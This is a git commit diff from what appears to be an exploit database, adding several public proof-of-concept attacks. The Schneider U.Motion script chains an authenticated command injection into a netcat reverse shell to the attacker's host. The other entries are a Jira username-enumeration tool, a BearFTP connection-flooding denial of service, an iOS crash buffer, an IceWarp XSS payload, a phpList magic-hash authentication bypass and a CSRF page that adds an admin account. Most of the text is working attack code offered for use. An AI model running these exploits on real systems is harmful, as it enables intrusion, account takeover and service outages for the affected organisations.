DB: 2020-02-04
8 changes to exploits/shellcodes BearFTP 0.1.0 - 'PASV' Denial of Service P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC) Jobberbase 2.0 CMS - 'jobs-in' SQL Injection IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting phpList 3.5.0 - Authentication Bypass Jira 8.3.4 - Information Disclosure (Username Enumeration) Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
This commit is contained in:
Offensive Security
parent
ab03a59682
commit
8683ee3eea
9 changed files with 948 additions and 2 deletions
226
exploits/hardware/webapps/47991.py
Executable file
226
exploits/hardware/webapps/47991.py
Executable file
|
|
@ -0,0 +1,226 @@
|
|||
# Exploit Title: Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection
|
||||
# Date: 2018-08-01
|
||||
# Exploit Author: Cosmin Craciun
|
||||
# Vendor Homepage: https://www.se.com
|
||||
# Version: <= 1.3.4
|
||||
# Tested on: Delivered Virtual Appliance running on Windows 10 x64
|
||||
# CVE : CVE-2018-7777
|
||||
# References: https://github.com/cosmin91ro
|
||||
|
||||
#!/usr/bin/oython
|
||||
|
||||
|
||||
from __future__ import print_function
|
||||
import httplib
|
||||
import urllib
|
||||
import argparse
|
||||
import re
|
||||
import sys
|
||||
import socket
|
||||
import threading
|
||||
import time
|
||||
|
||||
parser = argparse.ArgumentParser(description='PoC')
|
||||
parser.add_argument('--target', help='IP or hostname of target', required=True)
|
||||
parser.add_argument('--port', help='TCP port the target app is running', required=True, default='8080')
|
||||
parser.add_argument('--username', help='TCP port the target app is running', required=True, default='admin')
|
||||
parser.add_argument('--password', help='TCP port the target app is running', required=True, default='admin')
|
||||
parser.add_argument('--command', help='malicious command to run', default='shell')
|
||||
parser.add_argument('--src_ip', help='IP of listener for the reverse shell', required=True)
|
||||
parser.add_argument('--timeout', help='time in seconds to wait for a response', type=int, default=3)
|
||||
|
||||
class Exploiter(threading.Thread):
|
||||
def __init__ (self, target, port, timeout, uri, body, headers, shell_mode):
|
||||
threading.Thread.__init__(self)
|
||||
self.target = target
|
||||
self.port = port
|
||||
self.timeout = timeout
|
||||
self.uri = uri
|
||||
self.body = body
|
||||
self.headers = headers
|
||||
self.shell_mode = shell_mode
|
||||
|
||||
def send_exploit(self, target, port, timeout, uri, body, headers):
|
||||
print('Sending exploit ...')
|
||||
conn = httplib.HTTPConnection("{0}:{1}".format(target, port), timeout=timeout)
|
||||
conn.request("POST", uri, body, headers)
|
||||
print("Exploit sent")
|
||||
if not self.shell_mode: print("Getting response ...")
|
||||
|
||||
try:
|
||||
response = conn.getresponse()
|
||||
if not self.shell_mode: print(str(response.status) + " " + response.reason)
|
||||
data = response.read()
|
||||
if not self.shell_mode: print('Response: {0}\r\nCheck the exploit result'.format(data))
|
||||
|
||||
except socket.timeout:
|
||||
if not self.shell_mode: print("Connection timeout while waiting response from the target.\r\nCheck the exploit result")
|
||||
|
||||
def run(self):
|
||||
self.send_exploit(self.target, self.port, self.timeout, self.uri, self.body, self.headers)
|
||||
|
||||
class Listener(threading.Thread):
|
||||
def __init__(self, src_ip):
|
||||
threading.Thread.__init__(self)
|
||||
self.src_ip = src_ip
|
||||
|
||||
def run(self):
|
||||
self.listen(self.src_ip)
|
||||
|
||||
def listen(self, src_ip):
|
||||
TCP_IP = src_ip
|
||||
TCP_PORT = 4444
|
||||
BUFFER_SIZE = 1024
|
||||
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.bind((TCP_IP, TCP_PORT))
|
||||
print("Listener open on port {0}".format(TCP_PORT))
|
||||
s.listen(1)
|
||||
|
||||
conn, addr = s.accept()
|
||||
print('Exploited: ' + str(addr))
|
||||
|
||||
while 1:
|
||||
comm = raw_input("shell$ ").strip()
|
||||
if comm == "quit":
|
||||
conn.close()
|
||||
sys.exit(0)
|
||||
|
||||
if comm != "":
|
||||
conn.send(comm + " 2>&1" + "\x0a")
|
||||
while 1:
|
||||
data = conn.recv(BUFFER_SIZE)
|
||||
if not data: break
|
||||
print(data, end="")
|
||||
if "\x0a" in data: break
|
||||
|
||||
except Exception as ex:
|
||||
print("Could not start listener")
|
||||
print(ex)
|
||||
|
||||
def login(target, port, username, password):
|
||||
uri = "http://{0}:{1}/umotion/modules/system/user_login.php".format(target, port)
|
||||
|
||||
params = urllib.urlencode({
|
||||
'username': username,
|
||||
'password': password,
|
||||
'rememberMe': '1',
|
||||
'context': 'configuration',
|
||||
'op': 'login'
|
||||
})
|
||||
|
||||
headers = {
|
||||
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
|
||||
"Accept": "*/*"
|
||||
}
|
||||
|
||||
try:
|
||||
conn = httplib.HTTPConnection("{0}:{1}".format(target, port))
|
||||
conn.request("POST", uri, params, headers)
|
||||
response = conn.getresponse()
|
||||
print(str(response.status) + " " + response.reason)
|
||||
data = response.read()
|
||||
except socket.timeout:
|
||||
print("Connection timeout while logging in. Check if the server is available")
|
||||
return
|
||||
|
||||
|
||||
cookie = response.getheader("Set-Cookie")
|
||||
#print(cookie)
|
||||
|
||||
r = re.match(r'PHPSESSID=(.{26});.*loginSeed=(.{32})', cookie)
|
||||
if r is None:
|
||||
print("Regex not match, could not get cookies")
|
||||
return
|
||||
|
||||
if len(r.groups()) < 2:
|
||||
print("Error while getting cookies")
|
||||
return
|
||||
|
||||
sessid = r.groups()[0]
|
||||
login_seed = r.groups()[1]
|
||||
|
||||
return sessid, login_seed
|
||||
|
||||
conn.close()
|
||||
|
||||
|
||||
def encode_multipart_formdata(fields, files):
|
||||
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
|
||||
CRLF = '\r\n'
|
||||
L = []
|
||||
for (key, value) in fields:
|
||||
L.append('--' + LIMIT)
|
||||
L.append('Content-Disposition: form-data; name="%s"' % key)
|
||||
L.append('')
|
||||
L.append(value)
|
||||
for (key, filename, value) in files:
|
||||
L.append('--' + LIMIT)
|
||||
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
|
||||
L.append('Content-Type: application/x-gzip')
|
||||
L.append('')
|
||||
L.append(value)
|
||||
L.append('--' + LIMIT + '--')
|
||||
L.append('')
|
||||
body = CRLF.join(L)
|
||||
content_type = 'multipart/form-data; boundary=%s' % LIMIT
|
||||
return content_type, body
|
||||
|
||||
|
||||
def exploit(target, port, username, password, command, timeout):
|
||||
uri = "http://{0}:{1}/umotion/modules/system/update_module.php".format(target, port)
|
||||
|
||||
fields = [
|
||||
('choose_update_mode', 'MANUAL'),
|
||||
('add_button', '0'),
|
||||
('format', 'json'),
|
||||
('step', '2'),
|
||||
('next', '1'),
|
||||
('name_update_file', ''),
|
||||
('path_update_file', ''),
|
||||
('type_update_file', '')
|
||||
]
|
||||
|
||||
listener = None
|
||||
if command == "shell":
|
||||
shell_mode = True
|
||||
command = "nc -e $SHELL {0} 4444".format(args.src_ip)
|
||||
listener = Listener(args.src_ip)
|
||||
listener.start()
|
||||
time.sleep(3)
|
||||
else:
|
||||
shell_mode = False
|
||||
|
||||
files = [
|
||||
('update_file', 'my;{0};file.tar.gz'.format(command), "\x1f\x8b")
|
||||
]
|
||||
|
||||
content_type, body = encode_multipart_formdata(fields, files)
|
||||
|
||||
if not shell_mode or (shell_mode and listener and listener.isAlive()):
|
||||
print('Logging in ...')
|
||||
sess_id, login_seed = login(target, port, username, password)
|
||||
if sess_id is None or login_seed is None:
|
||||
print('Error while logging in')
|
||||
return
|
||||
|
||||
print('Logged in ! ')
|
||||
|
||||
headers = {
|
||||
'Accept': 'application/json,text/javascript,*/*; q=0.01',
|
||||
'Accept-Encoding': 'gzip,deflate',
|
||||
'Referer': 'http://{0}:{1}/umotion/modules/system/externalframe.php?context=configuration'.format(target, port),
|
||||
'X-Requested-With': 'XMLHttpRequest',
|
||||
'Content-Length': len(body),
|
||||
'Content-Type': content_type,
|
||||
'Connection': 'keep-alive',
|
||||
'Cookie': 'PHPSESSID={0}; loginSeed={1}'.format(sess_id, login_seed)
|
||||
}
|
||||
|
||||
exploiter = Exploiter(target, port, timeout, uri, body, headers, shell_mode)
|
||||
exploiter.start()
|
||||
|
||||
if __name__ == '__main__':
|
||||
args = parser.parse_args()
|
||||
exploit(args.target, args.port, args.username, args.password, args.command, args.timeout)
|
||||
29
exploits/ios/dos/47993.py
Executable file
29
exploits/ios/dos/47993.py
Executable file
|
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)
|
||||
# Discovery by: Ivan Marmolejo
|
||||
# Discovery Date: 2020-02-02
|
||||
# Vendor Homepage: https://apps.apple.com/mx/app/p2pwificam2/id663665207
|
||||
# Software Link: App Store for iOS devices
|
||||
# Tested Version: 10.4.1
|
||||
# Vulnerability Type: Denial of Service (DoS) Local
|
||||
# Tested on OS: iPhone 6s iOS 13.3
|
||||
|
||||
# Summary: P2PWIFICAM is a matching network camera P2P (point to point) monitoring software.
|
||||
# Adopt the advanced P2P technology, can make the camera in the intranet from port mapping complex,
|
||||
# truly plug and play!
|
||||
|
||||
# Steps to Produce the Crash:
|
||||
|
||||
# 1.- Run python code: P2PWIFICAM.py
|
||||
# 2.- Copy content to clipboard
|
||||
# 3.- Open "P2PWIFICAM" for Ios
|
||||
# 4.- Go to "Add" (Touch here to add a camera)
|
||||
# 5.- Go to "Input Camera"
|
||||
# 6.- Paste Clipboard on "Camera ID"
|
||||
# 7.- Paste Clipboard on "Password"
|
||||
# 9.- Ok
|
||||
# 10- Crashed
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
buffer = "\x41" * 257
|
||||
print (buffer)
|
||||
88
exploits/java/webapps/47990.py
Executable file
88
exploits/java/webapps/47990.py
Executable file
|
|
@ -0,0 +1,88 @@
|
|||
# Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration)
|
||||
# Date: 2019-09-11
|
||||
# Exploit Author: Mufeed VH
|
||||
# Vendor Homepage: https://www.atlassian.com/
|
||||
# Software Link: https://www.atlassian.com/software/jira
|
||||
# Version: 8.3.4
|
||||
# Tested on: Pop!_OS 19.10
|
||||
# CVE : CVE-2019-8449
|
||||
|
||||
# CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
|
||||
# DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/
|
||||
# CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
|
||||
__author__ = "Mufeed VH (@mufeedvh)"
|
||||
|
||||
import os
|
||||
import requests
|
||||
|
||||
|
||||
class CVE_2019_8449:
|
||||
def ask_for_domain(self):
|
||||
domain = raw_input("[>] Enter the domain of Jira instance: => ")
|
||||
if domain == "":
|
||||
print("\n[-] ERROR: domain is required\n")
|
||||
self.ask_for_domain()
|
||||
self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)
|
||||
|
||||
def ask_for_query(self):
|
||||
self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ")
|
||||
if self.query == "":
|
||||
print("\n[-] ERROR: The query parameter is required\n")
|
||||
self.ask_for_query()
|
||||
|
||||
def exploit(self):
|
||||
self.ask_for_domain()
|
||||
self.ask_for_query()
|
||||
|
||||
maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ")
|
||||
showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")
|
||||
fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ")
|
||||
projectId = raw_input("\n[>] Enter the projectId to fetch: => ")
|
||||
issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ")
|
||||
avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ")
|
||||
caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")
|
||||
excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")
|
||||
|
||||
params = {
|
||||
'query': self.query,
|
||||
'maxResults': maxResults,
|
||||
'showAvatar': showAvatar,
|
||||
'fieldId': fieldId,
|
||||
'projectId': projectId,
|
||||
'issueTypeId': issueTypeId,
|
||||
'avatarSize': avatarSize,
|
||||
'caseInsensitive': caseInsensitive,
|
||||
'excludeConnectAddons': excludeConnectAddons
|
||||
}
|
||||
|
||||
send_it = requests.get(url = self.url, params = params)
|
||||
|
||||
try:
|
||||
response = send_it.json()
|
||||
except:
|
||||
print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")
|
||||
print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")
|
||||
print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))
|
||||
quit()
|
||||
|
||||
print("\n<========== RESPONSE ==========>\n")
|
||||
print(response)
|
||||
print("\n<==============================>\n")
|
||||
|
||||
if __name__ == '__main__':
|
||||
os.system('cls' if os.name == 'nt' else 'clear')
|
||||
|
||||
print('''
|
||||
================================================
|
||||
| |
|
||||
| CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 |
|
||||
| Proof of Concept By: Mufeed VH [@mufeedvh] |
|
||||
| |
|
||||
================================================
|
||||
''')
|
||||
|
||||
CVE_2019_8449().exploit()
|
||||
43
exploits/linux/dos/47987.cs
Normal file
43
exploits/linux/dos/47987.cs
Normal file
|
|
@ -0,0 +1,43 @@
|
|||
# Exploit Title: BearFTP 0.1.0 - 'PASV' Denial of Service
|
||||
# Date: 2020-01-29
|
||||
# Exploit Author: kolya5544
|
||||
# Vendor Homepage: http://iktm.me/
|
||||
# Software Link: https://github.com/kolya5544/BearFTP/releases
|
||||
# Version: v0.0.1 - v0.1.0
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE : CVE-2020-8416
|
||||
|
||||
static void Main(string[] args)
|
||||
{
|
||||
Console.WriteLine("DoS started. Approx. time to complete: 204 seconds.");
|
||||
for (int i = 0; i < 1024*8; i++) // We will do 8000+ connections. Usually server only spawns half of them.
|
||||
{
|
||||
new Thread(() =>
|
||||
{
|
||||
Thread.CurrentThread.IsBackground = true;
|
||||
|
||||
TcpClient exploit = new TcpClient("HOSTNAME", PASV_PORT); //Replace with actual data to test it.
|
||||
var ns = exploit.GetStream();
|
||||
StreamWriter sw = new StreamWriter(ns);
|
||||
sw.AutoFlush = true;
|
||||
StreamReader sr = new StreamReader(ns);
|
||||
|
||||
|
||||
while (true)
|
||||
{
|
||||
Thread.Sleep(5000); //We just spend our time.
|
||||
}
|
||||
}).Start();
|
||||
Thread.Sleep(25); //Spawn a new connection every 25ms so we don't kill our own connection.
|
||||
}
|
||||
while (true)
|
||||
{
|
||||
Console.WriteLine("DoS attack completed!");
|
||||
Thread.Sleep(20000);
|
||||
}
|
||||
}
|
||||
/*
|
||||
BEFORE PATCH APPLIED (after ~100 seconds of attacking):
|
||||
3700 threads spawned, VIRT went from 3388M to 32.1G, RES from 60000 to 129M. CPU usage ~10%. The server struggles to process commands. Recovers in several minutes after the attack is stopped
|
||||
AFTER PATCH APPLIED:
|
||||
10 threads spawned at most, VIRT didnt change, RES didnt change. CPU usage ~3%. Works fine. */
|
||||
|
|
@ -1,7 +1,7 @@
|
|||
# Exploit Title: Jobberbase 2.0 CMS - 'jobs-in' SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 28, August 2019
|
||||
# Exploit Author: Naren Jangra
|
||||
# Exploit Author: Suvadip Kar
|
||||
# Vendor Homepage: http://jobberbase.com/
|
||||
# Software Link: https://github.com/filipcte/jobberbase/zipball/master
|
||||
# Version: 2.0
|
||||
|
|
|
|||
34
exploits/php/webapps/47988.txt
Normal file
34
exploits/php/webapps/47988.txt
Normal file
|
|
@ -0,0 +1,34 @@
|
|||
# Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting
|
||||
# Date: 2020-01-27
|
||||
# Author: Lutfu Mert Ceylan
|
||||
# Vendor Homepage: www.icewarp.com
|
||||
# Tested on: Windows 10
|
||||
# Versions: 11.4.4.1 and before
|
||||
# Vulnerable Parameter: "color" (Get Method)
|
||||
# Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server
|
||||
# CVE: CVE-2020-8512
|
||||
|
||||
# Notes:
|
||||
|
||||
# An attacker can use XSS (in color parameter IceWarp WebMail 11.4.4.1 and
|
||||
# before)to send a malicious script to an unsuspecting Admins or users. The
|
||||
# end admins or useras browser has no way to know that the script should not
|
||||
# be trusted, and will execute the script. Because it thinks the script came
|
||||
# from a trusted source, the malicious script can access any cookies, session
|
||||
# tokens, or other sensitive information retained by the browser and used
|
||||
# with that site. These scripts can even rewrite the content of the HTML
|
||||
# page. Even an attacker can easily place users in social engineering through
|
||||
# this vulnerability and create a fake field.
|
||||
|
||||
# PoC:
|
||||
|
||||
# Go to Sign-in page through this path: http://localhost/webmail/ or
|
||||
http://localhost:32000/webmail/
|
||||
|
||||
# Add the "color" parameter to the URL and write malicious code, Example:
|
||||
http://localhost/webmail/?color="><svg/onload=alert(1)>
|
||||
|
||||
# When the user goes to the URL, the malicious code is executed
|
||||
|
||||
Example Vulnerable URL: http://localhost/webmail/?color=
|
||||
"><svg/onload=alert(1)>
|
||||
90
exploits/php/webapps/47989.php
Normal file
90
exploits/php/webapps/47989.php
Normal file
|
|
@ -0,0 +1,90 @@
|
|||
# Exploit Title: phpList 3.5.0 - Authentication Bypass
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-02-03
|
||||
# Exploit Author: Suvadip Kar
|
||||
# Author Contact: https://twitter.com/spidersec
|
||||
# Vendor Homepage: https://www.phplist.org
|
||||
# Software Link: https://www.phplist.org/download-phplist/
|
||||
# Version: 3.5.0
|
||||
# Tested on: Linux
|
||||
# CVE : N/A
|
||||
|
||||
Background of the Vulnerability :
|
||||
|
||||
Php loose comparison '==' compares two operands by converting them to integers even if they are strings.
|
||||
|
||||
EXAMPLE CODE:
|
||||
|
||||
<?php
|
||||
var_dump(hash('sha256', 'TyNOQHUS') == '0e66298694359207596086558843543959518835691168370379069085300385');
|
||||
var_dump(hash('sha256', '34250003024812') == '0e66298694359207596086558843543959518835691168370379069085300385');
|
||||
?>
|
||||
|
||||
OUTPUT:
|
||||
|
||||
bool(true)
|
||||
bool(true)
|
||||
|
||||
Vulnerable code:
|
||||
|
||||
GITHUB: https://github.com/phpList/phplist3/blob/master/public_html/lists/admin/phpListAdminAuthentication.php
|
||||
-----
|
||||
if(empty($login)||($password=="")){
|
||||
return array(0, s('Please enter your credentials.'));
|
||||
}
|
||||
if ($admindata['disabled']) {
|
||||
return array(0, s('your account has been disabled'));
|
||||
}
|
||||
if (//Password validation.
|
||||
!empty($passwordDB) && $encryptedPass == $passwordDB // Vulnerable because loose comparison is used
|
||||
)
|
||||
return array($admindata['id'], 'OK');
|
||||
else {
|
||||
if (!empty($GLOBALS['admin_auth_module'])) {
|
||||
Error(s('Admin authentication has changed, please update your admin module'),
|
||||
'https://resources.phplist.com/documentation/errors/adminauthchange');
|
||||
return;
|
||||
}
|
||||
return array(0, s('incorrect password'));
|
||||
|
||||
}
|
||||
-------
|
||||
|
||||
Steps to reproduce:
|
||||
|
||||
1. Set the string 'TyNOQHUS' as password for username 'admin'. Its sha256 value is 0e66298694359207596086558843543959518835691168370379069085300385.
|
||||
|
||||
2. Now navigate to endpoint '/admin' and try to login with username 'admin' password 'TyNOQHUS'.
|
||||
|
||||
3. User Logged in with valid password.
|
||||
|
||||
4. Now logout from the application and try to login with username 'admin' password '34250003024812'.
|
||||
|
||||
5. User Logged in, without valid password.
|
||||
|
||||
6. Authentication bypassed because of PHP loose comparison.
|
||||
|
||||
FIX: This vulnerability can be fixed by using strict comparison (===) in place of loose comparison.
|
||||
-----
|
||||
if(empty($login)||($password=="")){
|
||||
return array(0, s('Please enter your credentials.'));
|
||||
}
|
||||
if ($admindata['disabled']) {
|
||||
return array(0, s('your account has been disabled'));
|
||||
}
|
||||
if (//Password validation.
|
||||
!empty($passwordDB) && $encryptedPass === $passwordDB // Fixed by using strict comparison '==='.
|
||||
)
|
||||
return array($admindata['id'], 'OK');
|
||||
else {
|
||||
if (!empty($GLOBALS['admin_auth_module'])) {
|
||||
Error(s('Admin authentication has changed, please update your admin module'),
|
||||
'https://resources.phplist.com/documentation/errors/adminauthchange');
|
||||
return;
|
||||
}
|
||||
return array(0, s('incorrect password'));
|
||||
|
||||
}
|
||||
-------
|
||||
|
||||
Additional Resource: https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
|
||||
429
exploits/php/webapps/47992.txt
Normal file
429
exploits/php/webapps/47992.txt
Normal file
|
|
@ -0,0 +1,429 @@
|
|||
# Title: School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
|
||||
# Date: 2020-01-31
|
||||
# Exploit Author: J3rryBl4nks
|
||||
# Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/
|
||||
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/
|
||||
# Version ERP-Ultimate
|
||||
# Tested on Windows 10/Kali Rolling
|
||||
# The School ERP Ultimate web application is vulnerable to Cross Site Request Forgery
|
||||
# that leads to admin account creation and arbitrary user deletion.
|
||||
# Proof of Concept for the Admin Account Creation:
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://SITEHERE/office_admin/?pid=42&action=addadmin" method="POST">
|
||||
<input type="hidden" name="admin_fname" value="Admin" />
|
||||
<input type="hidden" name="admin_lname" value="Tester" />
|
||||
<input type="hidden" name="admin_username" value="testing" />
|
||||
<input type="hidden" name="admin_password" value="testing123" />
|
||||
<input type="hidden" name="admin_password2" value="testing123" />
|
||||
<input type="hidden" name="admin_email" value="test@test.com" />
|
||||
<input type="hidden" name="admin_phoneno" value="9999999999" />
|
||||
<input type="hidden" name="adminlevel" value="" />
|
||||
<input type="hidden" name="admin_more" value="Test" />
|
||||
<input type="hidden" name="1_p" value="1_p" />
|
||||
<input type="hidden" name="1_1" value="1_1" />
|
||||
<input type="hidden" name="1_2" value="1_2" />
|
||||
<input type="hidden" name="1_4" value="1_4" />
|
||||
<input type="hidden" name="1_3" value="1_3" />
|
||||
<input type="hidden" name="2_p" value="2_p" />
|
||||
<input type="hidden" name="2_1" value="2_1" />
|
||||
<input type="hidden" name="2_2" value="2_2" />
|
||||
<input type="hidden" name="2_3" value="2_3" />
|
||||
<input type="hidden" name="2_4" value="2_4" />
|
||||
<input type="hidden" name="2_5" value="2_5" />
|
||||
<input type="hidden" name="2_6" value="2_6" />
|
||||
<input type="hidden" name="2_7" value="2_7" />
|
||||
<input type="hidden" name="2_8" value="2_8" />
|
||||
<input type="hidden" name="2_9" value="2_9" />
|
||||
<input type="hidden" name="2_10" value="2_10" />
|
||||
<input type="hidden" name="2_11" value="2_11" />
|
||||
<input type="hidden" name="2_12" value="2_12" />
|
||||
<input type="hidden" name="2_13" value="2_13" />
|
||||
<input type="hidden" name="2_14" value="2_14" />
|
||||
<input type="hidden" name="2_15" value="2_15" />
|
||||
<input type="hidden" name="2_20" value="2_20" />
|
||||
<input type="hidden" name="2_18" value="2_18" />
|
||||
<input type="hidden" name="2_19" value="2_19" />
|
||||
<input type="hidden" name="3_p" value="3_p" />
|
||||
<input type="hidden" name="3_1" value="3_1" />
|
||||
<input type="hidden" name="3_2" value="3_2" />
|
||||
<input type="hidden" name="3_3" value="3_3" />
|
||||
<input type="hidden" name="3_5" value="3_5" />
|
||||
<input type="hidden" name="3_4" value="3_4" />
|
||||
<input type="hidden" name="4_p" value="4_p" />
|
||||
<input type="hidden" name="5_p" value="5_p" />
|
||||
<input type="hidden" name="5_1" value="5_1" />
|
||||
<input type="hidden" name="5_3" value="5_3" />
|
||||
<input type="hidden" name="5_2" value="5_2" />
|
||||
<input type="hidden" name="5_5" value="5_5" />
|
||||
<input type="hidden" name="5_6" value="5_6" />
|
||||
<input type="hidden" name="6_p" value="6_p" />
|
||||
<input type="hidden" name="7_p" value="7_p" />
|
||||
<input type="hidden" name="7_1" value="7_1" />
|
||||
<input type="hidden" name="7_2" value="7_2" />
|
||||
<input type="hidden" name="7_3" value="7_3" />
|
||||
<input type="hidden" name="7_4" value="7_4" />
|
||||
<input type="hidden" name="7_5" value="7_5" />
|
||||
<input type="hidden" name="8_p" value="8_p" />
|
||||
<input type="hidden" name="8_1" value="8_1" />
|
||||
<input type="hidden" name="8_2" value="8_2" />
|
||||
<input type="hidden" name="8_3" value="8_3" />
|
||||
<input type="hidden" name="8_101" value="8_101" />
|
||||
<input type="hidden" name="8_4" value="8_4" />
|
||||
<input type="hidden" name="8_5" value="8_5" />
|
||||
<input type="hidden" name="8_6" value="8_6" />
|
||||
<input type="hidden" name="8_16" value="8_16" />
|
||||
<input type="hidden" name="8_102" value="8_102" />
|
||||
<input type="hidden" name="8_7" value="8_7" />
|
||||
<input type="hidden" name="8_8" value="8_8" />
|
||||
<input type="hidden" name="8_9" value="8_9" />
|
||||
<input type="hidden" name="8_17" value="8_17" />
|
||||
<input type="hidden" name="8_103" value="8_103" />
|
||||
<input type="hidden" name="8_104" value="8_104" />
|
||||
<input type="hidden" name="8_10" value="8_10" />
|
||||
<input type="hidden" name="8_11" value="8_11" />
|
||||
<input type="hidden" name="8_12" value="8_12" />
|
||||
<input type="hidden" name="8_18" value="8_18" />
|
||||
<input type="hidden" name="8_105" value="8_105" />
|
||||
<input type="hidden" name="8_106" value="8_106" />
|
||||
<input type="hidden" name="8_13" value="8_13" />
|
||||
<input type="hidden" name="8_14" value="8_14" />
|
||||
<input type="hidden" name="8_15" value="8_15" />
|
||||
<input type="hidden" name="8_19" value="8_19" />
|
||||
<input type="hidden" name="8_107" value="8_107" />
|
||||
<input type="hidden" name="8_108" value="8_108" />
|
||||
<input type="hidden" name="9_p" value="9_p" />
|
||||
<input type="hidden" name="9_1" value="9_1" />
|
||||
<input type="hidden" name="9_17" value="9_17" />
|
||||
<input type="hidden" name="9_18" value="9_18" />
|
||||
<input type="hidden" name="9_19" value="9_19" />
|
||||
<input type="hidden" name="9_2" value="9_2" />
|
||||
<input type="hidden" name="9_20" value="9_20" />
|
||||
<input type="hidden" name="9_21" value="9_21" />
|
||||
<input type="hidden" name="9_22" value="9_22" />
|
||||
<input type="hidden" name="9_3" value="9_3" />
|
||||
<input type="hidden" name="9_4" value="9_4" />
|
||||
<input type="hidden" name="9_5" value="9_5" />
|
||||
<input type="hidden" name="9_6" value="9_6" />
|
||||
<input type="hidden" name="9_101" value="9_101" />
|
||||
<input type="hidden" name="9_7" value="9_7" />
|
||||
<input type="hidden" name="9_102" value="9_102" />
|
||||
<input type="hidden" name="9_8" value="9_8" />
|
||||
<input type="hidden" name="9_103" value="9_103" />
|
||||
<input type="hidden" name="9_24" value="9_24" />
|
||||
<input type="hidden" name="9_25" value="9_25" />
|
||||
<input type="hidden" name="9_33" value="9_33" />
|
||||
<input type="hidden" name="9_23" value="9_23" />
|
||||
<input type="hidden" name="9_11" value="9_11" />
|
||||
<input type="hidden" name="9_13" value="9_13" />
|
||||
<input type="hidden" name="9_27" value="9_27" />
|
||||
<input type="hidden" name="9_14" value="9_14" />
|
||||
<input type="hidden" name="9_29" value="9_29" />
|
||||
<input type="hidden" name="9_30" value="9_30" />
|
||||
<input type="hidden" name="9_31" value="9_31" />
|
||||
<input type="hidden" name="9_15" value="9_15" />
|
||||
<input type="hidden" name="9_16" value="9_16" />
|
||||
<input type="hidden" name="9_32" value="9_32" />
|
||||
<input type="hidden" name="10_p" value="10_p" />
|
||||
<input type="hidden" name="10_1" value="10_1" />
|
||||
<input type="hidden" name="10_2" value="10_2" />
|
||||
<input type="hidden" name="10_3" value="10_3" />
|
||||
<input type="hidden" name="10_4" value="10_4" />
|
||||
<input type="hidden" name="10_5" value="10_5" />
|
||||
<input type="hidden" name="10_6" value="10_6" />
|
||||
<input type="hidden" name="10_7" value="10_7" />
|
||||
<input type="hidden" name="10_8" value="10_8" />
|
||||
<input type="hidden" name="10_11" value="10_11" />
|
||||
<input type="hidden" name="10_9" value="10_9" />
|
||||
<input type="hidden" name="10_10" value="10_10" />
|
||||
<input type="hidden" name="10_12" value="10_12" />
|
||||
<input type="hidden" name="11_p" value="11_p" />
|
||||
<input type="hidden" name="11_1" value="11_1" />
|
||||
<input type="hidden" name="11_2" value="11_2" />
|
||||
<input type="hidden" name="11_3" value="11_3" />
|
||||
<input type="hidden" name="11_4" value="11_4" />
|
||||
<input type="hidden" name="11_5" value="11_5" />
|
||||
<input type="hidden" name="11_6" value="11_6" />
|
||||
<input type="hidden" name="11_7" value="11_7" />
|
||||
<input type="hidden" name="11_8" value="11_8" />
|
||||
<input type="hidden" name="11_9" value="11_9" />
|
||||
<input type="hidden" name="11_10" value="11_10" />
|
||||
<input type="hidden" name="11_11" value="11_11" />
|
||||
<input type="hidden" name="11_12" value="11_12" />
|
||||
<input type="hidden" name="11_13" value="11_13" />
|
||||
<input type="hidden" name="11_14" value="11_14" />
|
||||
<input type="hidden" name="11_15" value="11_15" />
|
||||
<input type="hidden" name="11_16" value="11_16" />
|
||||
<input type="hidden" name="11_17" value="11_17" />
|
||||
<input type="hidden" name="11_18" value="11_18" />
|
||||
<input type="hidden" name="11_19" value="11_19" />
|
||||
<input type="hidden" name="11_20" value="11_20" />
|
||||
<input type="hidden" name="11_21" value="11_21" />
|
||||
<input type="hidden" name="11_23" value="11_23" />
|
||||
<input type="hidden" name="11_101" value="11_101" />
|
||||
<input type="hidden" name="11_102" value="11_102" />
|
||||
<input type="hidden" name="11_22" value="11_22" />
|
||||
